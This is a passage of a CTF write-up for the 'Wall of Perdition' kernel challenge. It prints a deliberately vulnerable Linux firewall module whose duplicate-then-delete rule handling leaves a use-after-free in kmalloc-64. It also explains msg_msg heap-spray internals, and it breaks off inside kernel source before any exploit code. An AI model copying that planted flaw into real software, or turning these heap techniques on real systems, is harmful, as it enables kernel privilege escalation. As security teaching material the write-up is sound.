Wall of Perdition is the second and harder part of a two part series of
kernel exploitation challenges designed by
FizzBuzz101 and me for corCTF
2021. You can find the writeup for the
first part, Fire of
Salvation,
on his blog. Unfortunately, both challenges during competition remained
unsolved. Wall of Perdition consists of a vulnerable Linux Kernel
Module, the bug is a 0x30 bytes Use After Free Write in kmalloc-64. With
this challenge, we present a new approach to transform the Linux
kernel’s IPC mechanism, more specifically, message operations, in an exploitation toolkit. Let’s get started!
Overview
For this challenge, we decided to write a kernel firewall, based on
NetFilter,
controllable from user space via
ioctl(). A user can add rules
,
edit rules
, delete rules
and duplicate rules
(from inbound
list to outbound list and vice versa).
We used the FGKASLR
branch of
the Linux kernel. Function Granular Kernel Address Space Layout
Randomization, increases the level of
protection offered by KASLR: while KASLR moves the entire kernel code
text at a “random location” at boot time, FGKASLR rearranges the kernel
code at load time on a per-function level granularity. This makes code
reuse attacks very difficult to accomplish, as now knowing the kernel
base address (due to a information leak for example) is no longer a
sufficient condition to calculate the address of an arbitrary function.
Supervisor Mode Execution Prevention (SMEP) and Supervisor Mode
Access Prevention (SMAP) are enabled, so it is neither possible to
execute code in user space from kernel space, nor access data in higher
CPU rings without using specific functions like copy_from_user()
/
copy_to_user()
which turn off the SMAP flag of the CR4 register before
accessing data in user space.
As additional protections, we set CONFIG_STATIC_USERMODEHELPER
to
true, forcing all usermode helper calls through a single binary, then we
set CONFIG_STATIC_USERMODEHELPER_PATH
to an empty sting. This way
it is impossible to overwrite targets like
modprobe_path,
core_pattern
and so on, to make the kernel execute an arbitrary binary.
Finally, we decided to use the SLAB allocator instead of SLUB to
avoid any attempt of freelist poisoning, an attack that we will discuss
in a future article. Freelist
randomization was also enabled.
The challenge and kernel configuration can be found here: Wall of
Perdition
A Buggy Linux Kernel Firewall
We decided to release the firewall source code, so players could directly focus
on the exploitation phase. Here is the source code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
|
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/device.h>
#include <linux/mutex.h>
#include <linux/fs.h>
#include <linux/slab.h>
#include <linux/miscdevice.h>
#include <linux/uaccess.h>
#include <linux/random.h>
#include <crypto/hash.h>
#include <linux/types.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <linux/net.h>
#include <linux/in.h>
#include <linux/skbuff.h>
#include <linux/ip.h>
#include <linux/inet.h>
#include <linux/tcp.h>
#include <linux/udp.h>
MODULE_AUTHOR("FizzBuzz and D3v17");
#ifdef EASY_MODE
MODULE_DESCRIPTION("Fire of Salvation");
#endif
#ifndef EASY_MODE
MODULE_DESCRIPTION("Wall of Perdition");
#endif
MODULE_LICENSE("GPL");
#define DEVICE_NAME "firewall"
#define CLASS_NAME "firewall"
#define ADD_RULE 0x1337babe
#define DELETE_RULE 0xdeadbabe
#define EDIT_RULE 0x1337beef
#define SHOW_RULE 0xdeadbeef
#define DUP_RULE 0xbaad5aad
#define ERROR -1
#define SUCCESS 0
#define MAX_RULES 0x80
#define INBOUND 0
#define OUTBOUND 1
#define SKIP -1
#ifdef EASY_MODE
#define DESC_MAX 0x800
#endif
typedef struct
{
char iface[16];
char name[16];
char ip[16];
char netmask[16];
uint8_t idx;
uint8_t type;
uint16_t proto;
uint16_t port;
uint8_t action;
#ifdef EASY_MODE
char desc[DESC_MAX];
#endif
} user_rule_t;
typedef struct
{
char iface[16];
char name[16];
uint32_t ip;
uint32_t netmask;
uint16_t proto;
uint16_t port;
uint8_t action;
uint8_t is_duplicated;
#ifdef EASY_MODE
char desc[DESC_MAX];
#endif
} rule_t;
rule_t **firewall_rules_in;
rule_t **firewall_rules_out;
static DEFINE_MUTEX(firewall_lock);
static long firewall_ioctl(struct file *file, unsigned int cmd, unsigned long arg);
static uint32_t firewall_inbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state);
static uint32_t firewall_outbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state);
static uint32_t process_rule(struct sk_buff *skb, rule_t *rule, uint8_t type, int i);
static long firewall_add_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_delete_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_edit_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_show_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_dup_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static struct miscdevice firewall_device;
static struct file_operations firewall_fops = {.unlocked_ioctl = firewall_ioctl};
static struct nf_hook_ops in_hook = {
.hook = firewall_inbound_hook,
.hooknum = NF_INET_PRE_ROUTING,
.pf = PF_INET,
.priority = NF_IP_PRI_FIRST
};
static struct nf_hook_ops out_hook = {
.hook = firewall_outbound_hook,
.hooknum = NF_INET_POST_ROUTING,
.pf = PF_INET,
.priority = NF_IP_PRI_FIRST
};
static long firewall_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
int ret;
user_rule_t user_rule;
rule_t **firewall_rules;
mutex_lock(&firewall_lock);
memset(&user_rule, 0, sizeof(user_rule_t));
if (copy_from_user((void *)&user_rule, (void *)arg, sizeof(user_rule_t)))
{
printk(KERN_INFO "[Firewall::Error] firewall_ioctl() cannot copy user request!\n");
mutex_unlock(&firewall_lock);
return ERROR;
}
if (user_rule.idx >= MAX_RULES)
{
printk(KERN_INFO "[Firewall::Info] firewall_ioctl() invalid index!\n");
mutex_unlock(&firewall_lock);
return ERROR;
}
if ((user_rule.type != INBOUND) && (user_rule.type != OUTBOUND))
{
printk(KERN_INFO "[Firewall::Error] firewall_ioctl() invalid rule type!\n");
mutex_unlock(&firewall_lock);
return ERROR;
}
firewall_rules = (user_rule.type == INBOUND) ? firewall_rules_in : firewall_rules_out;
switch (cmd)
{
case ADD_RULE:
ret = firewall_add_rule(user_rule, firewall_rules, user_rule.idx);
break;
case DELETE_RULE:
ret = firewall_delete_rule(user_rule, firewall_rules, user_rule.idx);
break;
case SHOW_RULE:
ret = firewall_show_rule(user_rule, firewall_rules, user_rule.idx);
break;
case EDIT_RULE:
ret = firewall_edit_rule(user_rule, firewall_rules, user_rule.idx);
break;
case DUP_RULE:
ret = firewall_dup_rule(user_rule, firewall_rules, user_rule.idx);
break;
default:
ret = ERROR;
break;
}
mutex_unlock(&firewall_lock);
return ret;
}
static long firewall_add_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
printk(KERN_INFO "[Firewall::Info] firewall_add_rule() adding new rule!\n");
if (firewall_rules[idx] != NULL)
{
printk(KERN_INFO "[Firewall::Error] firewall_add_rule() invalid rule slot!\n");
return ERROR;
}
firewall_rules[idx] = (rule_t *)kzalloc(sizeof(rule_t), GFP_KERNEL);
if (!firewall_rules[idx])
{
printk(KERN_INFO "[Firewall::Error] firewall_add_rule() allocation error!\n");
return ERROR;
}
memcpy(firewall_rules[idx]->iface, user_rule.iface, 16);
memcpy(firewall_rules[idx]->name, user_rule.name, 16);
#ifdef EASY_MODE
strncpy(firewall_rules[idx]->desc, user_rule.desc, DESC_MAX);
#endif
if (in4_pton(user_rule.ip, strnlen(user_rule.ip, 16), (u8 *)&(firewall_rules[idx]->ip), -1, NULL) == 0)
{
printk(KERN_ERR "[Firewall::Error] firewall_add_rule() invalid IP format!\n");
kfree(firewall_rules[idx]);
firewall_rules[idx] = NULL;
return ERROR;
}
if (in4_pton(user_rule.netmask, strnlen(user_rule.netmask, 16), (u8 *)&(firewall_rules[idx]->netmask), -1, NULL) == 0)
{
printk(KERN_ERR "[Firewall::Error] firewall_add_rule() invalid Netmask format!\n");
kfree(firewall_rules[idx]);
firewall_rules[idx] = NULL;
return ERROR;
}
firewall_rules[idx]->proto = user_rule.proto;
firewall_rules[idx]->port = ntohs(user_rule.port);
firewall_rules[idx]->action = user_rule.action;
firewall_rules[idx]->is_duplicated = 0;
printk(KERN_ERR "[Firewall::Info] firewall_add_rule() new rule added!\n");
return SUCCESS;
}
static long firewall_delete_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
printk(KERN_INFO "[Firewall::Info] firewall_delete_rule() deleting rule!\n");
if (firewall_rules[idx] == NULL)
{
printk(KERN_INFO "[Firewall::Error] firewall_delete_rule() invalid rule slot!\n");
return ERROR;
}
kfree(firewall_rules[idx]); // [3]
firewall_rules[idx] = NULL;
return SUCCESS;
}
static long firewall_edit_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
printk(KERN_INFO "[Firewall::Info] firewall_edit_rule() editing rule!\n");
#ifdef EASY_MODE
printk(KERN_INFO "[Firewall::Error] Note that description editing is not implemented.\n");
#endif
if (firewall_rules[idx] == NULL)
{
printk(KERN_INFO "[Firewall::Error] firewall_edit_rule() invalid idx!\n");
return ERROR;
}
memcpy(firewall_rules[idx]->iface, user_rule.iface, 16);
memcpy(firewall_rules[idx]->name, user_rule.name, 16);
if (in4_pton(user_rule.ip, strnlen(user_rule.ip, 16), (u8 *)&(firewall_rules[idx]->ip), -1, NULL) == 0)
{
printk(KERN_ERR "[Firewall::Error] firewall_edit_rule() invalid IP format!\n");
return ERROR;
}
if (in4_pton(user_rule.netmask, strnlen(user_rule.netmask, 16), (u8 *)&(firewall_rules[idx]->netmask), -1, NULL) == 0)
{
printk(KERN_ERR "[Firewall::Error] firewall_edit_rule() invalid Netmask format!\n");
return ERROR;
}
firewall_rules[idx]->proto = user_rule.proto;
firewall_rules[idx]->port = ntohs(user_rule.port);
firewall_rules[idx]->action = user_rule.action;
printk(KERN_ERR "[Firewall::Info] firewall_edit_rule() rule edited!\n");
return SUCCESS;
}
static long firewall_show_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
printk(KERN_INFO "[Firewall::Error] Function not implemented.\n");
return ERROR;
}
static long firewall_dup_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
uint8_t i;
rule_t **dup;
printk(KERN_INFO "[Firewall::Info] firewall_dup_rule() duplicating rule!\n");
dup = (user_rule.type == INBOUND) ? firewall_rules_out : firewall_rules_in;
if (firewall_rules[idx] == NULL)
{
printk(KERN_INFO "[Firewall::Error] firewall_dup_rule() nothing to duplicate!\n");
return ERROR;
}
if (firewall_rules[idx]->is_duplicated)
{
printk(KERN_INFO "[Firewall::Info] firewall_dup_rule() rule already duplicated before!\n");
return ERROR;
}
for (i = 0; i < MAX_RULES; i++)
{
if (dup[i] == NULL)
{
dup[i] = firewall_rules[idx];
firewall_rules[idx]->is_duplicated = 1;
printk(KERN_INFO "[Firewall::Info] firewall_dup_rule() rule duplicated!\n");
return SUCCESS;
}
}
printk(KERN_INFO "[Firewall::Error] firewall_dup_rule() nowhere to duplicate!\n");
return ERROR;
}
static uint32_t process_rule(struct sk_buff *skb, rule_t *rule, uint8_t type, int i)
{
struct iphdr *iph;
struct tcphdr *tcph;
struct udphdr *udph;
printk(KERN_INFO "[Firewall::Info] rule->iface: %s...\n", rule->iface);
printk(KERN_INFO "[Firewall::Info] skb->dev->name: %s...\n", skb->dev->name);
if (strncmp(rule->iface, skb->dev->name, 16) != 0)
{
printk(KERN_INFO "[Firewall::Error] Rule[%d], inferface doesn't match, skipping!\n", i);
return SKIP;
}
iph = ip_hdr(skb);
if (type == INBOUND)
{
if ((rule->ip & rule->netmask) != (iph->saddr & rule->netmask))
{
printk(KERN_INFO "[Firewall::Error] Rule[%d], ip->saddr doesn't belong to the provided subnet, skipping!\n", i);
return SKIP;
}
}
else
{
if ((rule->ip & rule->netmask) != (iph->daddr & rule->netmask))
{
printk(KERN_INFO "[Firewall::Error] Rule[%d], ip->daddr doesn't belong to the provided subnet, skipping!\n", i);
return SKIP;
}
}
if ((rule->proto == IPPROTO_TCP) && (iph->protocol == IPPROTO_TCP))
{
printk(KERN_INFO "[Firewall::Info] Rule[%d], protocol is TCP\n", i);
tcph = tcp_hdr(skb);
if ((rule->port != 0) && (rule->port != tcph->dest))
{
printk(KERN_INFO "[Firewall::Error] Rule[%d], rule->port (%d) != tcph->dest (%d), skipping!\n", i, ntohs(rule->port), ntohs(tcph->dest));
return SKIP;
}
if ((rule->action != NF_DROP) && (rule->action != NF_ACCEPT))
{
printk(KERN_INFO "[Firewall::Error] Rule[%d], invalid action (%d), skipping!\n", i, rule->action);
return SKIP;
}
printk(KERN_INFO "[Firewall::Info] %s Rule[%d], action %d\n", (type == INBOUND) ? "Inbound" : "Outbound", i, rule->action);
return rule->action;
}
else if ((rule->proto == IPPROTO_UDP) && (iph->protocol == IPPROTO_UDP))
{
printk(KERN_INFO "[Firewall::Info] Rule[%d], protocol is UDP\n", i);
udph = udp_hdr(skb);
if ((rule->port != 0) && (rule->port != udph->dest))
{
printk(KERN_INFO "[Firewall::Error] Rule[%d], rule->port (%d) != udph->dest (%d), skipping!\n", i, ntohs(rule->port), ntohs(udph->dest));
return SKIP;
}
if ((rule->action != NF_DROP) && (rule->action != NF_ACCEPT))
{
printk(KERN_INFO "[Firewall::Error] Rule[%d], invalid action (%d), skipping!\n", i, rule->action);
return SKIP;
}
printk(KERN_INFO "[Firewall::Info] %s Rule[%d], action %d\n", (type == INBOUND) ? "Inbound" : "Outbound", i, rule->action);
return rule->action;
}
return SKIP;
}
static uint32_t firewall_inbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
int i;
uint32_t ret;
for (i = 0; i < MAX_RULES; i++)
{
if (firewall_rules_in[i])
{
ret = process_rule(skb, firewall_rules_in[i], INBOUND, i);
if (ret != SKIP)
return ret;
}
}
return NF_ACCEPT;
}
static uint32_t firewall_outbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
int i;
uint32_t ret;
for (i = 0; i < MAX_RULES; i++)
{
if (firewall_rules_out[i])
{
ret = process_rule(skb, firewall_rules_out[i], OUTBOUND, i);
if (ret != SKIP)
return ret;
}
}
return NF_ACCEPT;
}
static int init_firewall(void)
{
mutex_init(&firewall_lock);
firewall_device.minor = MISC_DYNAMIC_MINOR;
firewall_device.name = DEVICE_NAME;
firewall_device.fops = &firewall_fops;
if (misc_register(&firewall_device))
{
printk(KERN_INFO "[Firewall::Error] Device registration failed!\n");
return ERROR;
}
printk(KERN_INFO "[Firewall::Init] Initializing firewall...\n");
firewall_rules_in = kzalloc(sizeof(void *) * MAX_RULES, GFP_KERNEL);
firewall_rules_out = kzalloc(sizeof(void *) * MAX_RULES, GFP_KERNEL);
if (nf_register_net_hook(&init_net, &in_hook) < 0)
{
printk(KERN_INFO "[Firewall::Error] Cannot register nf hook!\n");
return ERROR;
}
if (nf_register_net_hook(&init_net, &out_hook) < 0)
{
printk(KERN_INFO "[Firewall::Error] Cannot register nf hook!\n");
return ERROR;
}
printk(KERN_INFO "[Firewall::Init] Firewall initialized!\n");
#ifdef EASY_MODE
printk(KERN_INFO "[Firewall::Init] 👼 Welcome to Easy Mode 👼\n");
#else
printk(KERN_INFO "[Firewall::Init] 😈 Welcome to Hard Mode 😈\n");
#endif
return SUCCESS;
}
static void cleanup_firewall(void)
{
int i;
printk(KERN_INFO "[Firewall::Exit] Cleaning up...\n");
for (i = 0; i < MAX_RULES; i++)
{
if (firewall_rules_in[i] != NULL)
{
kfree(firewall_rules_in[i]);
}
if (firewall_rules_out[i] != NULL)
{
kfree(firewall_rules_out[i]);
}
}
memset(firewall_rules_in, 0, sizeof(void *) * MAX_RULES);
memset(firewall_rules_out, 0, sizeof(void *) * MAX_RULES);
kfree(firewall_rules_in);
firewall_rules_in = NULL;
kfree(firewall_rules_out);
firewall_rules_out = NULL;
nf_unregister_net_hook(&init_net, &in_hook);
nf_unregister_net_hook(&init_net, &out_hook);
misc_deregister(&firewall_device);
mutex_destroy(&firewall_lock);
printk(KERN_INFO "[Firewall::Exit] Cleanup done, bye!\n");
}
module_init(init_firewall);
module_exit(cleanup_firewall);
|
As we mentioned in the introduction, a user can interact with the
firewall using ioctl(). There are five exposed functions,
add_rule()
(line 184), delete rule()
(line 236), edit_rule()
(line 253), show_rule()
(line 292) and
duplicate_rule()
(line 299). As we can see from source code,
show_rule()
, despite being exposed, is not implemented.
The firewall is based on NetFilter and it is using two NetFilter
hooks,
a prerouting hook
to filter incoming packets (line 104) and a
postrouting hook
to filter outgoing packets (line 111). For this
reason in the source code there are two lists of pointers to rules,
firewall_rules_in
(line 86) and firewall_rules_out
. (line 87) Each list can contain up to 128 pointers to rules.
The request format to interact with the firewall is defined by the type
user_rule_t
(line 69). IP address and Netmask are sent to the
kernel in character buffers and are subsequently converted to integers
in kernel space as we can see in add_rule()
(line 209, 217) and
edit_rule()
(line 270, 276).
Other required fields include
interface name, rule name, rule index, port, type (0 for inbound or 1
for outbound), protocol, and the action to be taken when there is a
match in process_rule()
.
Once IP and Netmask have been converted to integers, the user request is
transferred in a new structure handled by the kernel, defined by the
type rule_t
(line 84). This structure will be allocated in
kmalloc-64
, since its size is 0x30 bytes.
Because of the exploitation phase being relatively complex, we decided to
make the bug very easy to spot. duplicate_rule()
allows users to
duplicate rules from the firewall_rules_in
list to the
firewall_rules_out
list and vice versa.
The problem arises if we decide
to duplicate a rule and then free it using delete_rule()
. At line 246 delete_rule()
will use kfree() to free the rule pointer
and then will set it to NULL, but the same pointer will still be
accessible in the other list.
This can lead to a 0x30 bytes Use After
Free Write in kmalloc-64 using edit_rule()
to modify the freed,
but still accessible rule.
A Dive Into Linux Kernel’s IPC
To exploit the UAF in kmalloc-64, we are going abuse the Linux kernel’s
IPC mechanism, more specifically, message operations.
The kernel offers two syscalls to perform Inter Process Communication
using messages, msgsnd() and
msgrcv(), respectively used to
send messages to, and receive messages from a message queue.
A message
in kernel space is composed by two parts, a message header,
described by the structure
msg_msg
and message data, following immediately afterwards. Here is the
msg_msg
structure:
1
2
3
4
5
6
7
8
|
struct msg_msg {
struct list_head m_list;
long m_type;
size_t m_ts; /* message text size */
struct msg_msgseg *next;
void *security;
/* the actual message follows immediately */
};
|
This elastic object is extensively used by kernel exploit developers to
perform heap spray. The size of the message can be controlled by the user, therefore it can be allocated in multiple caches, starting from
kmalloc-64
up to kmalloc-4k
.
Every time msgsnd()
is used to send a message, the kernel calls
do_msgsnd(),
which calls
load_msg(),
which in turn calls
alloc_msg()
to allocate the objects required to contain message header and message data.
The message content is subsequently
copied from user space to kernel space in load_msg()
.
For example, let’s say we want to send a message consisting of 0x1fc8
‘A’s: we first create a message queue using
msgget() then we send the actual
message using msgsnd()
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
[...]
struct msgbuf
{
long mtype;
char mtext[0x1fc8];
} msg;
msg.mtype = 1;
memset(msg.mtext, 'A', sizeof(msg.mtext));
qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT));
msgsnd(qid, &msg, sizeof(msg.mtext), 0);
[...]
|
Now let’s examine the source code of alloc_msg()
and
load_msg()
to understand what happens in kernel space:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
|
static struct msg_msg *alloc_msg(size_t len)
{
struct msg_msg *msg;
struct msg_msgseg **pseg;
size_t alen;
alen = min(len, DATALEN_MSG); // [1]
msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT); // [2]
if (msg == NULL)
return NULL;
msg->next = NULL;
msg->security = NULL;
len -= alen; // [3]
pseg = &msg->next;
while (len > 0) {
struct msg_msgseg *seg;
cond_resched();
alen = min(len, DATALEN_SEG); // [4]
seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT); // [5]
if (seg == NULL)
goto out_err;
*pseg = seg; // [6]
seg->next = NULL;
pseg = &seg->next;
len -= alen;
}
return msg;
out_err:
free_msg(msg);
return NULL;
}
|
As we can see in the source code above, in alloc_msg()
, the kernel
calculates alen = min(len, DATALEN_MSG);
[1], where len
is the message size provided
by the user, 0x1fc8
in our case, and
DATALEN_MSG
corresponds to
((size_t)PAGE_SIZE - sizeof(struct msg_msg))
.
By default PAGE_SIZE
is equal to 0x1000
bytes, and sizeof(struct msg_msg)
is equal to 0x30
bytes, therefore DATALEN_MSG
corresponds to 0xfd0 bytes, and
that line, in our case, will result in
alen = min(0x1fc8, 0xfd0) = 0xfd0
.
At the next line, the kernel allocates the message using
msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT);
[2]. Here sizeof(*msg)
is equal to 0x30
bytes (basically the message header size) and alen
,
as we discussed above, is equal to 0xfd0. That line, in our case,
will be equal to
msg = kmalloc(0x1000, GFP_KERNEL_ACCOUNT);
: this message will be allocated in kmalloc-4k
.
After a couple of lines, len
, the message size
provided by the user, is decremented by alen
[3], then the kernel starts allocating all necessary segments to store the remaining data until len
is equal to zero.
Segments are connected in a singly linked list.
The
size of a segment is calculated by
alen = min(len, DATALEN_SEG);
[4], basically min(ramaining size, DATALEN_SEG)
.
In our case, len
was decremented by
alen
, therefore corresponds to
len = len - alen = 0x1fc8 - 0xfd0 = 0xff8
.
DATALEN_SEG
is defined as
((size_t)PAGE_SIZE - sizeof(struct msg_msgseg))
and since sizeof(struct msg_msgseg)
is equal to
0x8 bytes, DATALEN_SEG
corresponds to 0xff8 bytes.
That line will result in
alen = min(0xff8, 0xff8) = 0xff8;
.
At the next line, the segment is allocated using
seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT);
[5]. Since sizeof(*seg)
is equal to 0x8
bytes and alen
now is 0xff8, that line will be
equal to
seg = kmalloc(0x1000, GFP_KERNEL_ACCOUNT);
. Even
this segment, will be allocated in kmalloc-4k.
Finally segment pointer is saved in the message header
[6], and the function can return the pointer to the message.
At this point
load_msg()
is ready to copy the message content from user space to kernel space:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
|
struct msg_msg *load_msg(const void __user *src, size_t len)
{
struct msg_msg *msg;
struct msg_msgseg *seg;
int err = -EFAULT;
size_t alen;
msg = alloc_msg(len); // [1]
if (msg == NULL)
return ERR_PTR(-ENOMEM);
alen = min(len, DATALEN_MSG);
if (copy_from_user(msg + 1, src, alen)) // [2]
goto out_err;
for (seg = msg->next; seg != NULL; seg = seg->next) {
len -= alen;
src = (char __user *)src + alen;
alen = min(len, DATALEN_SEG);
if (copy_from_user(seg + 1, src, alen)) // [3]
goto out_err;
}
err = security_msg_msg_alloc(msg);
if (err)
goto out_err;
return msg;
out_err:
free_msg(msg);
return ERR_PTR(err);
}
|
As we can see from the load_msg()
source code, after allocating the
message using alloc_msg()
[1], it starts copying the message
data from user space to the allocated memory region in kernel space [2].
Then it copies the remaining data into segments [3]. In our case it will copy
the first 0xfd0 bytes in the first message, and the rest,
0xff8 bytes, in the segment.
Of course in our case, we only have a
single segment, so its pointer to the next segment will be NULL.
Here is our message in kernel memory:
And here is the corresponding segment:
Now let’s see what happens when we use msgrcv()
to receive the
message:
1
2
|
void *memdump = malloc(0x1fc8);
msgrcv(qid, memdump, 0x1fc8, 1, IPC_NOWAIT | MSG_NOERROR);
|
First, the kernel calls
do_msgrcv(),
setting its sixth argument, the msg_handler()
function pointer, to
do_msg_fill()
as we can see in
ksys_msgrcv():
1
2
3
4
5
|
long ksys_msgrcv(int msqid, struct msgbuf __user *msgp, size_t msgsz,
long msgtyp, int msgflg)
{
return do_msgrcv(msqid, msgp, msgsz, msgtyp, msgflg, do_msg_fill);
}
|
Later on, do_msg_fill()
will be used to copy the message from
kernel space to user space. Here is the source code of do_msgrcv()
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
|
static long do_msgrcv(int msqid, void __user *buf, size_t bufsz, long msgtyp, int msgflg,
long (*msg_handler)(void __user *, struct msg_msg *, size_t))
{
int mode;
struct msg_queue *msq;
struct ipc_namespace *ns;
struct msg_msg *msg, *copy = NULL;
DEFINE_WAKE_Q(wake_q);
ns = current->nsproxy->ipc_ns;
if (msqid < 0 || (long) bufsz < 0)
return -EINVAL;
if (msgflg & MSG_COPY) {
if ((msgflg & MSG_EXCEPT) || !(msgflg & IPC_NOWAIT))
return -EINVAL;
copy = prepare_copy(buf, min_t(size_t, bufsz, ns->msg_ctlmax)); // [4]
if (IS_ERR(copy))
return PTR_ERR(copy);
}
mode = convert_mode(&msgtyp, msgflg);
rcu_read_lock();
msq = msq_obtain_object_check(ns, msqid);
if (IS_ERR(msq)) {
rcu_read_unlock();
free_copy(copy);
return PTR_ERR(msq);
}
for (;;) {
struct msg_receiver msr_d;
msg = ERR_PTR(-EACCES);
if (ipcperms(ns, &msq->q_perm, S_IRUGO))
goto out_unlock1;
ipc_lock_object(&msq->q_perm);
/* raced with RMID? */
if (!ipc_valid_object(&msq->q_perm)) {
msg = ERR_PTR(-EIDRM);
goto out_unlock0;
}
msg = find_msg(msq, &msgtyp, mode); // [1]
if (!IS_ERR(msg)) {
/*
* Found a suitable message.
* Unlink it from the queue.
*/
if ((bufsz < msg->m_ts) && !(msgflg & MSG_NOERROR)) {
msg = ERR_PTR(-E2BIG);
goto out_unlock0;
}
/*
* If we are copying, then do not unlink message and do
* not update queue parameters.
*/
if (msgflg & MSG_COPY) {
msg = copy_msg(msg, copy); // [5]
goto out_unlock0;
}
list_del(&msg->m_list);
msq->q_qnum--;
msq->q_rtime = ktime_get_real_seconds();
ipc_update_pid(&msq->q_lrpid, task_tgid(current));
msq->q_cbytes -= msg->m_ts;
atomic_sub(msg->m_ts, &ns->msg_bytes);
atomic_dec(&ns->msg_hdrs);
ss_wakeup(msq, &wake_q, false);
goto out_unlock0;
}
/* No message waiting. Wait for a message */
if (msgflg & IPC_NOWAIT) {
msg = ERR_PTR(-ENOMSG);
goto out_unlock0;
}
list_add_tail(&msr_d.r_list, &msq->q_receivers);
msr_d.r_tsk = current;
msr_d.r_msgtype = msgtyp;
msr_d.r_mode = mode;
if (msgflg & MSG_NOERROR)
msr_d.r_maxsize = INT_MAX;
else
msr_d.r_maxsize = bufsz;
/* memory barrier not require due to ipc_lock_object() */
WRITE_ONCE(msr_d.r_msg, ERR_PTR(-EAGAIN));
/* memory barrier not required, we own ipc_lock_object() */
__set_current_state(TASK_INTERRUPTIBLE);
ipc_unlock_object(&msq->q_perm);
rcu_read_unlock();
schedule();
/*
* Lockless receive, part 1:
* We don't hold a reference to the queue and getting a
* reference would defeat the idea of a lockless operation,
* thus the code relies on rcu to guarantee the existence of
* msq:
* Prior to destruction, expunge_all(-EIRDM) changes r_msg.
* Thus if r_msg is -EAGAIN, then the queue not yet destroyed.
*/
rcu_read_lock();
/*
* Lockless receive, part 2:
* The work in pipelined_send() and expunge_all():
* - Set pointer to message
* - Queue the receiver task for later wakeup
* - Wake up the process after the lock is dropped.
*
* Should the process wake up before this wakeup (due to a
* signal) it will either see the message and continue ...
*/
msg = READ_ONCE(msr_d.r_msg);
if (msg != ERR_PTR(-EAGAIN)) {
/* see MSG_BARRIER for purpose/pairing */
smp_acquire__after_ctrl_dep();
goto out_unlock1;
}
/*
* ... or see -EAGAIN, acquire the lock to check the message
* again.
*/
ipc_lock_object(&msq->q_perm);
